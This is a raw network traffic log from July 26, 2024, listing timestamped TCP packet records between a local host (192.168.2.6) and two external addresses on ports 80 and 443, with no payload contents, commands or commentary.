Jul 26, 2024 12:57:24.757379055 CEST	80	60802	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:24.757484913 CEST	60802	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:24.758198023 CEST	60802	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:24.764045954 CEST	80	60802	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:24.815617085 CEST	443	60800	104.21.72.79	192.168.2.6
Jul 26, 2024 12:57:24.815778017 CEST	443	60800	104.21.72.79	192.168.2.6
Jul 26, 2024 12:57:24.815846920 CEST	60800	443	192.168.2.6	104.21.72.79
Jul 26, 2024 12:57:24.815846920 CEST	60800	443	192.168.2.6	104.21.72.79
Jul 26, 2024 12:57:24.815890074 CEST	60800	443	192.168.2.6	104.21.72.79
Jul 26, 2024 12:57:24.815910101 CEST	443	60800	104.21.72.79	192.168.2.6
Jul 26, 2024 12:57:25.011086941 CEST	80	60802	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:25.011159897 CEST	60802	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:25.120625973 CEST	60802	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:25.120924950 CEST	60804	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:25.140475035 CEST	80	60804	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:25.140559912 CEST	60804	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:25.140710115 CEST	60804	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:25.146250963 CEST	80	60804	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:25.151493073 CEST	80	60802	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:25.151546001 CEST	60802	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:25.345829964 CEST	443	60803	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:25.346141100 CEST	60803	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:25.346626997 CEST	60803	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:25.346679926 CEST	443	60803	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:25.348041058 CEST	60803	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:25.348041058 CEST	60803	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:25.348100901 CEST	443	60803	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:25.348159075 CEST	443	60803	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:25.864357948 CEST	60805	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:25.864450932 CEST	443	60805	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:25.864545107 CEST	60805	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:25.864793062 CEST	60805	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:25.864820957 CEST	443	60805	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:25.940911055 CEST	80	60804	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:25.940973043 CEST	60804	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:25.941627026 CEST	60804	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:25.961505890 CEST	80	60804	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:26.170072079 CEST	443	60803	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:26.170140982 CEST	60803	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:26.170150042 CEST	443	60803	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:26.170201063 CEST	60803	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:26.170972109 CEST	60803	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:26.170996904 CEST	443	60803	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:26.221061945 CEST	80	60804	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:26.221126080 CEST	60804	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:26.335416079 CEST	60804	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:26.335880995 CEST	60806	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:26.344367027 CEST	80	60806	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:26.344559908 CEST	60806	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:26.344706059 CEST	60806	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:26.346378088 CEST	80	60804	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:26.346436977 CEST	60804	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:26.350482941 CEST	80	60806	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:26.556615114 CEST	443	60805	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:26.556701899 CEST	60805	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:26.557142019 CEST	60805	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:26.557166100 CEST	443	60805	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:26.558840036 CEST	60805	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:26.558852911 CEST	443	60805	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:27.129156113 CEST	80	60806	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:27.129242897 CEST	60806	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:27.129998922 CEST	60806	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:27.136639118 CEST	80	60806	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:27.364840031 CEST	443	60805	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:27.364928007 CEST	60805	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:27.364991903 CEST	443	60805	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:27.365036011 CEST	443	60805	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:27.365099907 CEST	60805	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:27.365767956 CEST	60805	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:27.365797043 CEST	443	60805	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:27.482275963 CEST	60807	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:27.482321978 CEST	443	60807	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:27.482408047 CEST	60807	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:27.482671022 CEST	60807	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:27.482681990 CEST	443	60807	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:27.749998093 CEST	80	60806	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:27.750269890 CEST	60806	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:27.753882885 CEST	80	60806	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:27.753961086 CEST	60806	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:27.881607056 CEST	60806	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:27.882139921 CEST	60808	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:27.899545908 CEST	80	60808	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:27.899636030 CEST	60808	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:27.901180029 CEST	80	60806	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:27.901372910 CEST	60806	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:27.924710035 CEST	60808	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:27.936389923 CEST	80	60808	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:28.405464888 CEST	443	60807	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:28.405558109 CEST	60807	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:28.406021118 CEST	60807	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:28.406028032 CEST	443	60807	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:28.407696962 CEST	60807	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:28.407701969 CEST	443	60807	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:28.688013077 CEST	80	60808	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:28.688101053 CEST	60808	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:28.710248947 CEST	60808	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:28.715909958 CEST	80	60808	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:28.859216928 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:28.859308958 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:28.859419107 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:28.859662056 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:28.859672070 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:29.005683899 CEST	80	60808	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:29.006184101 CEST	60808	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:29.117111921 CEST	60808	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:29.117659092 CEST	60810	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:29.122873068 CEST	80	60810	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:29.123107910 CEST	60810	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:29.123203039 CEST	60810	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:29.123501062 CEST	80	60808	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:29.123558044 CEST	60808	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:29.128859997 CEST	80	60810	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:29.225719929 CEST	443	60807	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:29.225878954 CEST	60807	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:29.225904942 CEST	443	60807	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:29.225929022 CEST	443	60807	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:29.225955009 CEST	60807	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:29.225970030 CEST	60807	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:29.226819038 CEST	60807	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:29.226833105 CEST	443	60807	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:29.578305006 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:29.578629017 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:29.579031944 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:29.579085112 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:29.580545902 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:29.580560923 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:29.919595957 CEST	80	60810	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:29.919750929 CEST	60810	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:29.920393944 CEST	60810	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:29.925198078 CEST	80	60810	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:30.014811993 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.014833927 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.014846087 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.014971972 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.014971972 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.015041113 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.015103102 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.054071903 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.054092884 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.054198980 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.054230928 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.054280043 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.113858938 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.113871098 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.113981962 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.114015102 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.114067078 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.144913912 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.144927979 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.145071983 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.145103931 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.145153999 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.175187111 CEST	80	60810	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:30.175396919 CEST	60810	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:30.183635950 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.183649063 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.183795929 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.183828115 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.184139967 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.209146976 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.209183931 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.209279060 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.209279060 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.209311962 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.209580898 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.229427099 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.229465961 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.229590893 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.229590893 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.229624033 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.229670048 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.245475054 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.245515108 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.245606899 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.245644093 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.245670080 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.245697975 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.263660908 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.263699055 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.263825893 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.263825893 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.263891935 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.263952017 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.281975985 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.282013893 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.282104969 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.282104969 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.282138109 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.282195091 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.288589001 CEST	60810	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:30.288788080 CEST	60811	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:30.294387102 CEST	80	60811	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:30.294490099 CEST	60811	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:30.294567108 CEST	80	60810	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:30.294745922 CEST	60810	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:30.295030117 CEST	60811	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:30.296128988 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.296169043 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.296310902 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.296312094 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.296377897 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.296437979 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.300381899 CEST	80	60811	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:30.311584949 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.311625957 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.311681032 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.311743975 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.311783075 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.311805964 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.325021029 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.325059891 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.325160027 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.325191975 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.325216055 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.325237989 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.333055973 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.333093882 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.333183050 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.333183050 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.333216906 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.333261967 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.343092918 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.343132019 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.343189955 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.343226910 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.343250036 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.343271017 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.351021051 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.351062059 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.351141930 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.351141930 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.351161003 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.351242065 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.360277891 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.360316992 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.360436916 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.360438108 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.360502958 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.360594034 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.375530958 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.375571966 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.375674963 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.375674963 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.375709057 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.375750065 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.385757923 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.385797977 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.385850906 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.385859966 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.385883093 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.385911942 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.401923895 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.401962042 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.402121067 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.402121067 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.402153969 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.402200937 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.415400982 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.415440083 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.415559053 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.415560007 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.415625095 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.415683985 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.424062014 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.424099922 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.424196005 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.424196005 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.424228907 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.424272060 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.434416056 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.434453011 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.434544086 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.434545040 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.434577942 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.434631109 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.442213058 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.442257881 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.442327976 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.442359924 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.442384005 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.442404985 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.455307007 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.455348015 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.455409050 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.455424070 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.455456972 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.455476999 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.462029934 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.462069988 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.462121010 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.462133884 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.462172031 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.462191105 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.478837967 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.478867054 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.478920937 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.478929996 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.478970051 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.495573997 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.495598078 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.495671988 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.495680094 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.496083021 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.510039091 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.510082006 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.510155916 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.510155916 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.510184050 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.510226965 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.517151117 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.517196894 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.517232895 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.517250061 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.517275095 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.517292023 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.528594017 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.528701067 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.528739929 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.528803110 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.528847933 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.528847933 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.535052061 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.535092115 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.535120964 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.535129070 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.535166979 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.535187006 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.544390917 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.544435978 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.544487953 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.544496059 CEST	443	60809	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:30.544531107 CEST	60809	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:30.544555902 CEST	60809	443	192.168.2.6	5.75.212.60
